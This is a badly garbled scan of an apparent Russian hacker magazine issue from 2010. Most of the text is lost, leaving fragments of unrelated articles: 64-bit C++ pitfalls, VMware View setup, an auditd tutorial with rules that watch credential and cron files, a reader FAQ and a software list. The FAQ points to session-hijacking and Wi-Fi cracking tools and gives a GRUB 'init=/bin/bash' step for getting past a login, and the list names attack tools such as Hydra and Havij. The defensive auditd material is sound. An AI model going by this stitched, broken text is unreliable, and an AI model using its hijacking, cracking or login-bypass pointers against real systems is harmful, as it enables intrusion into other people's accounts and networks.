0x00000000FFFFFFF0u. ,
#ifdef, .
0xFFFFFFF0u
#ifdef _WIN64
#define CONST3264(a) (a##i64)
#else
#define CONST3264(a) (a)
#endif
const size_t M = ~CONST3264(0xFu);


-1. 0xFFFFFFFF. 64-
,
:



#define INVALID_RESULT (0xFFFFFFFFu)
size_t UserStrLen(const char *str)
{
if (str == NULL)
return INVALID_RESULT;
...
return n;
}
size_t len = UserStrLen(str);
// on a 64-bit build this check never fires
if (len == (size_t)(-1))
// error handling

if 32- , x64
.
, INVALID_RESULT,
32-, 64- , :
#define INVALID_RESULT (size_t(-1)).
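An added example (my own code, not the article's) that runs the four pitfalls from the snippets above beside their portable forms: the 32-bit sentinel, the 32-bit mask, the hard-coded shift width and the hard-coded element size. The function names and the TOP_BIT constant are mine; the results differ between 32-bit and 64-bit builds, as the comments note.

```cpp
#include <climits>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Added example: each 64-bit pitfall from the article's snippets beside a
// portable form. The names below are mine, not the article's.

// Highest bit of a size_t, used to build pointer-sized test values.
const size_t TOP_BIT = size_t(1) << (CHAR_BIT * sizeof(size_t) - 1);

// Pitfall 1: the -1 sentinel written as a 32-bit literal. On x64 the
// macro expands to 0x00000000FFFFFFFF, which is not size_t(-1).
#define INVALID_RESULT_32 (0xFFFFFFFFu)
#define INVALID_RESULT_OK (size_t(-1))

size_t UserStrLenBad(const char *str)
{
    if (str == nullptr) return INVALID_RESULT_32;
    return std::strlen(str);
}
size_t UserStrLenOk(const char *str)
{
    if (str == nullptr) return INVALID_RESULT_OK;
    return std::strlen(str);
}
// True when the caller's `len == (size_t)(-1)` check catches the error.
bool ErrorDetectedBad() { return UserStrLenBad(nullptr) == (size_t)(-1); }
bool ErrorDetectedOk()  { return UserStrLenOk(nullptr) == (size_t)(-1); }

// Pitfall 2: a mask written as a 32-bit literal clears the upper half of a
// 64-bit value. The fix mirrors the article's ~CONST3264(0xFu).
const size_t M_BAD = 0xFFFFFFF0u;
const size_t M_OK  = ~size_t(0xFu);
size_t AlignDownBad(size_t v) { return v & M_BAD; }
size_t AlignDownOk(size_t v)  { return v & M_OK; }

// Pitfall 3: "32" hard-coded as the width of size_t in a rotate; on x64 the
// bit that should wrap around to position 0 lands at position 32.
size_t RotateLeftBad(size_t n, unsigned r) { return (n << r) | (n >> (32 - r)); }
size_t RotateLeftOk(size_t n, unsigned r)
{
    const unsigned bits = CHAR_BIT * sizeof(n);
    return (n << r) | (n >> (bits - r));
}

// Pitfall 4: the element size hard-coded as 4 when sizing a buffer of
// pointer-sized integers; on x64 the buffer is half as large as needed.
size_t BufferBytesBad(size_t count) { return count * 4; }
size_t BufferBytesOk(size_t count)  { return count * sizeof(intptr_t); }
```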

,
32- 64-. ,

, . z

SYN/ACK
grinder grinder@tux.in.ua

VMware View 4.5:



,
.
. , ,
, , , ,
.
.

VMware View?

, .
:
, (),
. ,

, . , .

.
, .
.
, .
, , .
,
, . , , (SaaS, Software as a Service)
; Google: GMail, Google
Calendar, Google Docs .
?

, ,
.
. , ,
, ,
,
, .
( ),
.
?
.
(VDI, Virtual Desktop
Infrastructure). (Desktop as a Service,
DaaS), .

, ,
. , ,


. , , VDI
. ,
, .
: VDI MS Remote Desktop Services ( Win2k8R2
MS Terminal Services)?. , ,
. VDI TS/RDS ,
. , TS/RDS, , , . ,
, TS .
.
VDI
, , .
. ,
, View Client with Local Mode
VDI-.
VDI
, . , VDI
TS,
.

VMware View 4

VMware ,
VMware View (vmware.com/products/view), . View VMware VDI, , 3.0,
VMware View.
PCoIP (PC-over-IP),

, . HD-,
USB-, LAN WAN. ,
, ,
. ,

PCoIP. PCoIP VMware View


( )
RDP HP RGS (Remote Graphics Software).
View VMware vSphere/
ESX ][. View . View
Manager ,
VM.
View Connection Server Security Server.
, , ,
( LDAP-)
. ( ). DMZ ,
, , WAN, .
VMware View Display,
. VMware View Direct
USB-. VMware View Printing,
. , ,
Unified Access (SSO)
. View Composer

. VMware ThinApp , ,
.
View Connection Server NLB- Windows.
View
Client, .
with localmode;
View Manager. View Manager, VM, , TS
.. View Agent. 32-
64- Windows, , Mac OS X.
VMware View

Open Client (code.google.com/p/vmware-view-open-client), Windows-


VMware View, Linux Mac OS X. Open
Client LGPL v 2.1. - (View Portal).

- View Administrator, View PowerCLI
PowerShell vdmadmin.
4.5,
. ,
Win7, Mac OS X, , SCOM (System
Center Operations Manager), PowerShell .
.
, , VMware ROI
(Return on Investment) VMware View (roitco.vmware.com/vmw). VMware
View Enterprise Premier,
Bundle Add-On. , .
,
.

VMware View

VMware
, VMware View ( ). , .
Hardware Compatibility Guide
(vmware.com/resources/guides.html). ESX/ESXi,
.
VMware View VMware vSphere ESX/ESXi Server
vCenter ( ).
Active Directory, . View
OU,
GPO . IP-


View
Composer
DHCP DNS.
VMware View x86
Win2k3SP2 x86/x64 Win2k8R2,
.
2 CPU 2 RAM. ,
.
, View.
View Composter. .
,
( Win2k3 MS Framework 3.0). Database
Information , .
ODBS DSN Setup .
SQL- View
MS SQL Server 2k5/2k8, Express Edition ( 50 VM)
Oracle.
. Express Edition
Microsoft SQL
Server Management Studio Express (SSMSE),
MS. , Composer ( 8443).
View Connection Server. , ,
. IP-
. ,
.. Installation Options .
:
View Stardart Server
;
View Replica Server
; LDAP ;
View Security Server ;
DMZ LAN,
View , ;
View Transfer Server Local Mode.
,
Windows Firewall .
, Do not configure Windows
Firewall,
80, 443, 4001, 4100 8009 . , Install
. VCS
, .


View Connection Server

View Administrator

- View Administrator
.

https://server/admin. - IE
6/7 FF 3.0/3.5, Adobe Flash Player 10, . , -Win-
MS.
Domain Admins , .
,
.
View Administrator ,
,
.
. ,
( ),
. , : Dashboard, Users and Groups,
Inventory, , Policies View Configuration.
. ,
,
VA .
. View Configuration Product Licensing and Usage,
Edit License ,
VMware.
, ,
BUILTIN\Administrator. View
Configuration Administrators. Add User and Group,
.
.
, View,
.
View vCenter,
View Configuration Servers. Add
IP .
View Composer, Enable View Composer.
, Domains
Add, ,
, . ,

INFO

info

View
Administrator

VMware vSphere

][
2010 .
VMware
View Citrix
XenDesktop, Systancia
AppliDis Fusion,
Ericom PowerTerm
WebConnect, Oracle
VDI.


, vCenter
View Administrator. Edit
:
SSL , URL ,
-, .
( , SSL,
)
View Configuration Global Setting.


vSphere,
. , VM,
VMware Tools. ,
View Agent,
. ,
.
, vCenter (,
VM, ). VD Inventory.
:
Automated Pool vCenter,
;
Manual Pool ,
, ,
vCenter;

View Connection

Terminal Services Pool


Microsoft.
VM Pools,
Add .
, Pool ID. Setting
: , logoff, Adobe Flash. Connection Server; Connections
Server Restrictions, , ,
. ,
.
Desktops.

, VMware View
, .
. .
!z


SYN/ACK
, InfoWatch

, ,
. , ?
, , ,
....

. , ,
.
, ,
, . ,
. ,
(
,
). , , :
146 .

,
, 2007 146 (
) .
,
146-, . , , , .
, ,
, , , , ...
. . -
. ,
. ( , , ).
, . :
( 146-) , , , .

,
. ,
. ,


. . .
.
, .
;
.
, ,
, . , .
... ,
C, , , ,
,
. , , :
, .
,
, .
, . ,
, (, ,
).
, ,
. , ,
, , ,
. .
, ,
, .
, , , , , , .
.
, ;
, , .
(
) , , .

, ,
( -
) . .
...

,
.
, , , ,
.
,
. ,
,
( ; )
,
.
.
, , , , ,
. , ,
.
. , , ,
, , ,
, ?
, :
?.
. .
. .
, , ,
.
.

,
, , , , .
: , , ,
.
?
,
. . ,

. ,
play. record.
.
.

(, ).
, , .
. -.
, ,
- , ,
. -,
, . -,
, .
, . , ,
.
. ( , ).


C
3
C

1)
2
2)
3)




, , , ,
.

, ,
50 ( ) ?
, . , ,
, .
(
50 ),
. (omerta
, ,
. ).

.
.

. ,
. , DeFacto.
, .

? :
,
, , , . .
, ?


,

? , .
,
. ,
(
;
), :
!. , ,
, 146- -
. . (
) . .
,
: (
),
.

( )
.
.
, , .
, ,
, ,
. .
,
. ,
- . .
, .

4000 . .

XVII . .

. 35

. 1 . 44


, ;
, , , ,

()

;
, , ()
( XX )


, :
,
.
, , .
, /
. ,
( ). []
.

( ).
/
. .
.
, ,
.
, ,
:
, . (. 2
. 42 ) .

.
: , , . ,
; ,
,
. , .
.
, ,
: , ,
? .
,
.
( , ,
), , , .
. ,

. ,
(
, ), .
. , ,
, . , . ,
:
. . .

.

( )?


, . , , ,
.
, .
, ,
. ,

. ? , ,
. ,
,
, .

.
, ,
(, ). . ,
.

. , .

,
. ,
146- .
. , ,
. , .
! z


SYN/ACK
zobnin@gmail.com

DVD


auditd,


Debian/Ubuntu.


Linux

- Linux-
.
, .
-,
.
,
, - ( ).
,
, .
, / ,
, ,
, . Linux,
,
,
- .

2.6

2.6, Linux , .
, :
(, );
/ ;
;
;
;
;
.
,
.
, , ,
, .
,
auditd.

auditd Linux-
.
, auditd Debian/Ubuntu, :
$ sudo apt-get install auditd

, ,
:


auditctl , .
,
;
autrace , ( strace);
ausearch ,
;
aureport , ;
( , sudo auditctl -l).
- , . ,
, ,
Linux.


. , , ,
, ,
,
. ,
, . , , .
.
, , . , ,
,
auditd ,
.
, auditd.
,
(

).
, ,
, , ..
,


(, , ,
). , - ,
,
.

,
auditctl. ,
:
-a ;
-d ;
-D ;
-l .
auditctl -l , , , No rules, ,
. auditctl:
# auditctl -a <list>,<action> -S <syscall> -F <field=value>

, . :
task , ;
entry , ;
exit ,
;
user , , uid, pid gid;
exclude .
, . ,
,
. entry exit,

, .
'-a' , . : never always.
,
.
'-S', ,
(,
open, close, exit, ..). .

'-F'
. ,
,
open(), /etc, :
# auditctl -a exit,always -S open -F path=/etc/

, , ,
:
# auditctl -a exit,always -S open -F path=/etc/ -F perm=aw

'a' ( attribute change), 'w'


( write). 'r' (read) 'x'
(execute). :
pid , , apid ,
, success ,
, a1, a2, a3, a4
. key
,
, . ,
man- auditctl.
, auditctl , '-S' . ,

( '-p' perm):
# auditctl -a exit,always -F dir=/etc/ -F perm=wa

( '-p' perm, '-k' key):


# auditctl -w /etc/ -p wa -k access_etc

:
# auditctl -w /etc/passwd -p wa

, .
auditd : /etc/audit/auditd.conf /etc/audit/audit.rules (
/etc).

[Figure: auditd components: auditd.conf, audit.rules, auditctl, audispd, aureport, auditd, audit.log, application, autrace, ausearch, audit kernel]
, , , . ,
.
auditctl, ,
, ,
. :

, Steve Grubb

-w /var/log/audit/
-w /var/log/audit/audit.log


.
,
. , Debian/Ubuntu!

-w /etc/passwd -p wa

-, :
# delete all previously loaded rules
-D
# size of the kernel audit buffer (raise it on busy systems)
-b 8192
# what the kernel does when it cannot deliver an audit event:
# 0 - ignore silently
# 1 - report via dmesg
# 2 - halt the system (kernel panic)
-f 1

,
- .
, , .
# vi /etc/audit/audit.rules
# the audit subsystem's own configuration
-w /etc/audit/auditd.conf -p wa
-w /etc/audit/audit.rules -p wa
-w /etc/libaudit.conf -p wa
-w /etc/default/auditd -p wa
# at
-w /var/spool/at
-w /etc/at.allow
-w /etc/at.deny
# cron
-w /etc/cron.allow -p wa
-w /etc/cron.deny -p wa
-w /etc/cron.d/ -p wa
-w /etc/cron.daily/ -p wa
-w /etc/cron.hourly/ -p wa
-w /etc/cron.monthly/ -p wa
-w /etc/cron.weekly/ -p wa
-w /etc/crontab -p wa
-w /var/spool/cron/root
# user and group databases
-w /etc/group -p wa
-w /etc/passwd -p wa
-w /etc/shadow
# login settings and login history
-w /etc/login.defs -p wa
-w /etc/securetty
-w /var/log/faillog
-w /var/log/lastlog
# host name resolution
-w /etc/hosts -p wa
# init scripts
-w /etc/init.d/
-w /etc/init.d/auditd -p wa
# dynamic linker configuration
-w /etc/ld.so.conf.d
-w /etc/ld.so.conf -p wa
# time zone
-w /etc/localtime -p wa
# kernel parameters
-w /etc/sysctl.conf -p wa
# kernel module configuration
-w /etc/modprobe.d/
# PAM
-w /etc/pam.d/
# SSH
-w /etc/ssh/sshd_config

aureport


,
. ,

,


.
# vi /etc/audit/audit.rules
# permission and ownership changes
-a entry,always -S chmod -S fchmod -S chown -S chown32 -S fchown -S fchown32 -S lchown -S lchown32
# creating, opening and truncating files
-a entry,always -S creat -S open -S truncate -S truncate64 -S ftruncate -S ftruncate64
# creating and removing directories
-a entry,always -S mkdir -S rmdir
# deleting, renaming and linking files
-a entry,always -S unlink -S rename -S link -S symlink
# extended attributes
-a entry,always -S setxattr
-a entry,always -S lsetxattr
-a entry,always -S fsetxattr
-a entry,always -S removexattr
-a entry,always -S lremovexattr
-a entry,always -S fremovexattr
# device nodes
-a entry,always -S mknod
# mounting and unmounting file systems
-a entry,always -S mount -S umount -S umount2
# ptrace
-a entry,always -S ptrace

aureport -f grep

, auditd
/var/log/audit,
, ,
.
aureport, -.
, , ,
,
, .. ,
. , '-f', ,
:

Steve Grubb
Red Hat

:
http://people.redhat.com/sgrubb/audit/visualize/mkgraph
http://people.redhat.com/sgrubb/audit/visualize/mkbar

WARNING
warning
,

auditd,
,


/etc/init.d/auditd restart.

$ sudo aureport -f

,

(
'--end' ):
$ sudo aureport -f --start 08/20/10 12:00 --end 08/20/10 13:00

: now
(), recent ( ), today (
), yesterday ( ), this-week
(), this-month () this-year ().


ausearch -
:
$ sudo ausearch -ui 2010

:
$ sudo ausearch -x /usr/bin/nmap

:
$ sudo ausearch -tm pts/0

aureport -f --summary ,



, ( ):

:
$ sudo ausearch -tm cron

:
1. ;
2. ;
3. ;
4. ;
5. ( ,
'-i');
6. (yes no);
7. , ;
8. Audit UID (AUID). ;
9. .
,
'--summary', aureport
,
:
$ sudo aureport -f -i --start recent --summary

,
(
), .
// ,
aureport, ,
:
$ sudo aureport -f -i --start today | grep /etc/passwd

,
ausearch:
$ sudo ausearch -a <event_id>

ausearch
:
$ sudo ausearch -sc ptrace -i


$ sudo ausearch -k etc_access

ausearch , , aureport. aureport


,
, , , ( '-s'),
( '-au') , (
'-l'), ( '-m') (
man-).
, ( '--failed').

AUID PAM

su sudo
(UID), -
.
Audit UID
(AUID),

UID su sudo. ,
AUID (
aureport -l), , ,
PAM.
/etc/pam.d/login session required pam_loginuid.so session include common-session. /etc/pam.d/sshd, /etc/pam.d/gdm (kdm, KDE), /etc/pam.d/crond /etc/pam.d/atd.

Linux, . , , ,
. z

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

100% o a ao. a
ooa oa aooa a
a, aa a, a oo . a
ooo aa , o a aa,
oo . !
! ! !
, .
?
:

1973
-,

; , ,
-
.
,
,
,
, ,
,
,

. , ,

, :
, -
, ,
H. , -,
. ,
- .


,
,
.

,
, ,
,
. , ,
, . ,

, ,
, .

--- ,

, ,
:

1.
;
2.
;
3. , .
,
,
,

.
, , , (
, ,
- ?).
, ,


. ,
,

,
. ,
,
.

1.
.
,
.
, ,
,
. ,
,
, ;
,
, ,
,
,

, .
,
, ,
, , ;

, -
.
,
, ,
, , ,

,
.
2.
,
.
, ,
:

?
.
, : 10
, ; , .
, , . ,
. : , , ,
( , :)).
, (. -
)
,
, - ,
.



1986 - , .
,
.
: , , , , .
, , ,
. , , ( , ) .

, ?

!


;
,
(!!!) ;
,

,
.
( , ,
), . , ,
,
, .
3. ,
.
.
, ,
: , , -,
-,
,

, - . ,


, , .
:
,
(, ,
,
,
..) ( ,

,
!

)? , ,
, .
:
,
(.
). . ,

Corsair
H70, 50.
? , .
.
,

.
: ,
( ),

,

.
: , ,
, , echo print
( ,

):)? , ,
, ,
, . , ,

- , .
:

, ,
,
.
,
. ,
( ),

, .
: , ,

,
, .
: ,
-, ,
,
( ,
). :
,
?
.
-, , , ,
,
; -,
,
, ,

.

(
):
,
.
? .
,
.

, . .
.
:
!
!
:
:
,
! ! , , ?
.

,
:
!
!
:
,

.


,
? ,
,
, , . , ,
: , ,

(), , ,
,
.
.

, ,
, .

;
.

, , , ?
-
. ,
, :).

aka

: , ,
, ,
?
, : --!. ,
: . ,
: , .
,
, ,

,
. ,


. ,
,
, ,
, -
,
.
, . , ,
, ,
,
:
- ?,

: ? , !
! ,
, ,
,
. :
,
.
, : ( ) + ( ) = .
, , : -
( ) = ( ).
,
(
). ,
,
- ,
.
,
. ,

,
.


. , ,

;

,

,
( ). -
, , - .
,
,

, .
,
, , ,
, .
, , , ,

.
: ,
-

, ,
,
.
-
- (
),
, , ,
.



,
, , ,
.
,

,

, Left4Dead
.

,
,


, , ,
.
, ,
,
.
, ,
- ( ).
,
,
. ,
,
, ;
-
3-4 , ,
.
,
,
.
:
, , , ; .

70-80% ( ,
,
,
), .

, , , ,
.
. ,
- ,
,
. ,

, ,

,
.
, ,

.
1. ,
,
. ,
,
,
, .
, ,
.
( )
. ,
- (,
, ):
, , ( ) -

,
. ,
, , -,

2.
,
,
: , , ,
.

,

(
).
3.
:
, . ,
90% ,
, 2-3 ,
, . , ,

, .
,
MLM ( ).
, ,
, ,
. z


faq
united?
,
faq@real.xakep.ru

Q: , . .
-
, ? ?
A: /

com/p/torsocks).
:

USB- USB Flash Benchmark,


usbflashspeed.com. ,
.
,
Top 10 of the fastest Flash Drives
. ,
, Silicon Power LuxMini
920, 1000 .


, Torsocks,
DNS- . , , ,
.

Q:
Tor?
A:
Socks,
Torsocks (code.google.


apt-get install torsocks


usewithtor ssh username@ssh.com

torsocks pidgin

Q: ,
Malware?
A: Windows- OllyDbg,
IDA Pro
, , ,
.
REMnux (zeltser.
com/remnux),

. ,
Ubuntu, PDF- Flash-,
,
JS-,
, .
REMnux LiveCD VMware,
VMware Player.

Q: ,
802.11n, .
, Wi-Fi
Atheros,
. ?
A: , Wi-Fi-
Atheros AR9xxx. .

802.11n ,

. .
EEPROM,
,

Logitech Touch Mouse


iPhone/
iPad


. rghost.ru/2603267.
, ,
Windows Vista/7 x64
;
<F8>
.
:
1.
atheros_eeprom_tool.exe;
2. Read EEPROM EEPROM,
READ.
3. , ,

EEPROM. Write
EEPROM
.
4. Modes and
Channels .
5. Modes 802.11n (20MHz) 802.11n
(40MHz) 2.4GHz. 5GHz. Channels
0x67 OK.
13. ,
Use custom modes and channels, WRITE.
14. , .
(rghost.
ru/2501075).

. Windows7 x64,

.
Driver Signature Enforcement Overrider (www.
ngohq.com/home.php?page=dseo).

Q: - 802.11n ,
.
A:
Wi-Fi. 802.11n WPA2-PSK+AES

,
.
40MHz
1 9.

Q: , Windows Linux ( GRUB).



, (
) , .
A: ,
,
, .
-
. GRUB
.
:
;
Linux;
.
: GRUB2
e, GRUB Legacy
e, ;
, linux
kernel, quiet
splash ( ),
single init=/bin/bash;
( GRUB2,
Ctrl+X, GRUB Legacy Esc,
b).

.

Q: .
, .
A: ( )
, .
OllyDbg :
, -

,
Breakpoint Memory, on access.
Windbg,
ba.
: [ba r/w/e size adr],
r/w/e ( ,
), size , adr .

Q:
Visual Studio?
A: , . :
1. File Open Project/
Solution
(, c:\Windows\System32\calc.exe);
2.
Debug
command line.

Q:
.
,
.
A: -,
HTTP-,
.
,
Sessionthief (scriptjunkie1.
wordpress.com/2010/07/17/sessionthief).
,
, ARP poison ,
HTTP-. ,

Sessionthief
Firefox
.


, ,
,
, . ,



.

CMOS
Q: ,

.
.
A:
,
(DoIt, AutoIT ..).

, Mimer.

, ,
, .

Q:
.

. ,

WEP- SSID,
. , , ,
?
A:
, -
. . :)
Backtrack4 R1 Wifite,

WEP WPA .
(
, WEP,
..) GUI- .
, Wifite
WPA handshake'.

Q:
-
?
A: ,
-
.
RemCam 2
(redsh.ru),
/.
(
)
install.cmd,
, ( ),


Q: x-,
(
)
HTTP- .
?
A:
Fiddler. , HTTP(S)-

. ,

. ,

FiddlerCore (fiddler.wikidot.
com/fiddlercore),
.NET-.

API.

Q:
Windows, (
)?
A: CMOS De-Animator
(www.st-ware.com), CMOS, ,
,
. , Clear CMOS
, .

Q:
?
A: , .
Darik's Boot and Nuke (www.
dban.org). LiveCD,

. DBAN
, .
,

, :
,
.

Q: iPod , iTunes,
. ,
?
A: , iTunes ,
,

Apple .
, : CopyTrans
Manager (www.copytrans.net), Foobar2000
(www.foobar2000.org), MediaMonkey (www.
mediamonkey.com), Songbird (getsongbird.com).

Q: ,
?
A:
date | md5sum. , date md5sum
. ,
Cygwin (www.cygwin.com).

Q: -
.
Wi-Fi
.
A:
Logitech,

Logitech Touch Mouse (www.logitech.com).
-. Touch Mouse Server
(
Mac OS X), iPhone iPod Touch
Touch Mouse.
,
IP ,

.
, ,
. ,
Touch Mouse
, , ,
Android?

Q:

. ? ?
A: , ,
, , . ,
,
,
.
,
,
.
.
,
PayPal.

. -, ,
. ,
,
. z

>Net
Feed Demon 3.5.0.11 Beta
FireFTP 1.0.9
Google Chrome 7.0.536.2 Beta

>Multimedia
Alcohol 120% 2.0.1.2033
Blender 2.54 Beta
Evernote 3.5.6
FastStone Image Viewer 4.2
IrfanView 4.27
SPlayer 3.5
TagScanner 5.1.592
Portable-
Zoner Photo Studio Free 1.2
ZumoCast 1.1

>Misc
Appetizer 1.4
ArsClip 3.1.4
EasyDuplicateFinder
Eraser 6.0.7
Everything 1.2.1
FileLocator Lite 2010
FileToFolder 2.0
LastPass 1.70.1
LockHunter
PrtScr
PStart 2.11
Rainlendar 2.8
SecondShell 2.0.1
Tahometer Agent 1.0.8.2
Transmiti
VirtuaWin 4.3
WinDirStat 1.1.2
Windows 7 Taskbar Items Pinner
WRITEMONKEY 0.9

>Development
dirtyJOE 1.1
EMS SQL Manager for PostgreSQL
4.7
Inno Setup 5.3.11
PostgreSQL 9.0.0
TortoiseSVN 1.6.11

>Devel
Acovea 5.0

>>UNIX
>Desktop
2ManDVD 1.4.0
3ddesktop 0.2.9
Anki 1.0.1
Clementine 0.5.3
Eaglemode 0.79.0
Enlightenment 1.0.6
Fbpanel 6.1
Foobnix 0.2.1
FreeMat 4.0
Hawkscope 0.6.2
QLandkarte GT 0.19.2
raw2jpeg 0.1
Shutter 0.86.4
Thunar 1.1.0
Tulip 3.4.1
VLC 1.1.4.1
Win2-7 Pack 5.9.1
Xt7-Player 0.9.244

>System
Cameyo 1.5
ClamWin Free Antivirus 0.96.2.1
CleanMem 1.5.1
Comodo System Cleaner 2.2
Defraggler 1.21
Sandra 2010 SP2 v16.67 (freeware)
System Ninja 1.5
TimeComX 1.2.4.10
Toucan 3.0.3
Update Checker v1.038
WinPatrol 19.0.2010.0
xplorer2 lite v1.8

>Security
Burp Suite 1.3
CMOS De-Animator v2
DAVTest 1.0
Dojo 1.0
evercookie 0.3b
FindDomains 0.1.1
Hamster Sidejacking Tool 2.0.0
Havij v1.12 Free
HotFuzz
Knock 1.4.2 beta
Ncrack 0.3a
Netsparker Community Edition
OWASP Code Crawler 2.7
RIPS 0.35
Sessionthief
Simple Malware Check Tool 1.2
StreamArmor v1
THC-Hydra 5.8
TrueCrypt 7.0a
TSK 3.2.0b1 beta

Http File Server 2.2f


inSSIDer 2
TweetMyPC 3.5
WinSCP 4.2.9
XeroBank 3.9.10

>Server
389 Directory Server 1.2.6.1
3proxy 0.6.1
6tunnel 0.11

>Security
aafid2 0.10
ADMsmb 0.3
ADMsnmp 0.1
Aescrypt 0.7
AIM Sniff 1.0b
Bed 0.5
BlueBugger 0.1
Cupp 3.1
ferm 2.0.7
HotSpotter 0.4
ICMPchat 0.7
Kismet 2010-07 R1
Mixminion 0.0.8a
saltymd5 0.2
Sessionthief
SIPcrack 0.4
Wifite
Wireshark 1.4

>Net
Aget 0.4.1
Apinger 0.6.1
Crossroads Load Balancer 2.68
Evolution 2.32.0
Evolution Exchange 2.32.0
Gajim 0.14
Google Chrome 6.0.472.63
Hotot 0.9.4
InspIRCd 2.0.2
MapProxy 0.8.5
Minbif 1.0.4
Mozilla Firefox 3.6.10
NiX 1.4.0
Opera 10.62
ProxyChains 3.1
Steadyflow 0.1
Subdownloader 2.0.13
uTorrent alpha 3.0

>Games
Steel Storm Episode I

Ald 0.1.7
Autoconf 2.68
Cairo 1.10.0
Clutter 1.4.0
fabulous 0.1.5
GDB 7.2
gjrand 3.3.3
Gmail4J 0.3
Jad 1.5.8e
KDevelop 4.0.2
libgee 0.6.0
libpng 1.4.4
ORBit2 .2.14
Qt 4.7
SPE 0.8.4
Swftools 0.9.1
Zend Optimizer 3.3.9

>>MAC
7zX 1.7.1
Adium 1.3.10
Battery Health Monitor 1.5
Black Hole 1.2
Carbon Copy Cloner 3.3.4
CleanMyMac 1.9.3
Hawkscope 0.6.3
MacPorts 1.9.1
Mozilla Firefox 3.6.10
muCommander 0.8.5
OnyX 2.1.8
Opera 10.62
Seashore 0.5.1
SnapNDrag 2.5.7
StuffItExpander 2011
Tor 0.2.1.26
Transmission 2.04
VLC 1.1.3

>System
Ajenti
bzip2 1.0.6
Deja Dup 16.0
Drive I/O System Monitor Plasmoid
0.1
Gnome System Monitor 2.28.2
intltool 0.41.1
ATI Catalyst 10.9
Linux Kernel 2.6.35.7
Lzip 1.11
Monit 5.2
PlayOnLinux 3.8.3
R.I.P. 10.9
Spice 0.6
UNetbootin 490
xf86-video-intel 2.13.0

Apache 2.2.16
bftpd 3.1
BIND 9.7.2-P2
CUPS 1.4.4
Darwin Streaming Server 6.0.3
DHCP 4.1.1
MySQL 5.5
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
PostgreSQL 9.0
Samba 3.5.5
Squid 3.1.8
twoftpd 1.41
UnrealIRCd 3.2.8.1

/

11(142) 2010

>>WINDOWS
>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.6.1233
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.4.1
foobar2000 1.1
K-Lite Codec Pack 6.4.0
Miranda IM 0.9.4
Mozilla Firefox 3.6.10
Notepad++ 5.8.1
Opera 10.62
PuTTY 0.60
Skype Last
Sysinternals Suite (september)
Total Commander 7.55
Unlocker 1.9.0
XnView 1.97.8
x 11 () 2010


!
800 !

8.5
DVD

191

2200 .
23%
( )

(250 )

30 ,
31 ,
31 .


+ DVD

DVD
+ DVD

Total Football
+ DVD

DVDXpert

+ DVD

Smoke

PC : DEAD SPACE 2

10

: 250

#10(82) 2010

DEAD
SPACE 2

. 36

BIOSHOCK INFINITE

+ DVD

. 90

. 44

DRAGON AGE 2

, RPG

MAFIA 2

PC
+ 2 DVD

Mountain Bike

Digital Photo
+ DVD

+ DVD

T3

Onboard

Ski Pass

! !
. 50

.
: 210

11 (142) 2010



+ + 2 DVD: - 162
( 35% , )
+

12 3890 (24 )
6 2205 (12 )

,
.

,

, :

!
1. ,
,
http://shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
(495) 780-88-24;
119021, , . ,
. 11, . 44, , .

72 000 QIWI
() .

!
.
,
. , ,
.
, .
( )


. .

6 c 1260 ( ).
6
R-kiosk , . , .27-31 648 .
,
.

(495)780-88-29 ( ) 8-800-200-3-999 ( ,
, ). , /
INFO@GLC.RU WWW.GLC.RU .

UNITS

HTTP://WWW2

TOPCODER
www.topcoder.com
?
, ? ?
- .
TopCoder. Java, C++ C#,
$25 $300. ,

TopCoder Open. ,
Google Code Jam.

TAHOMETER
www.tahometer.com

, .
: ?.


.
tahometer, , . ,
. tahometer , .

DNS-

IPQ.CO
www.ipq.co
bit.ly tiny.cc,
URL- (,
http://bit.ly/9OtU7h). , ipq.co ,
, IP-. , DNS-,
.
IP, hostname
n4c10h.ipq.co, . , . ipq.
co , ,
- .


SPOTTHEVULN
www.spotthevuln.com

,
, . SpotTheVuln
.
? , , SQL Injections
.
(, WordPress) SpotTheVuln
,
. , .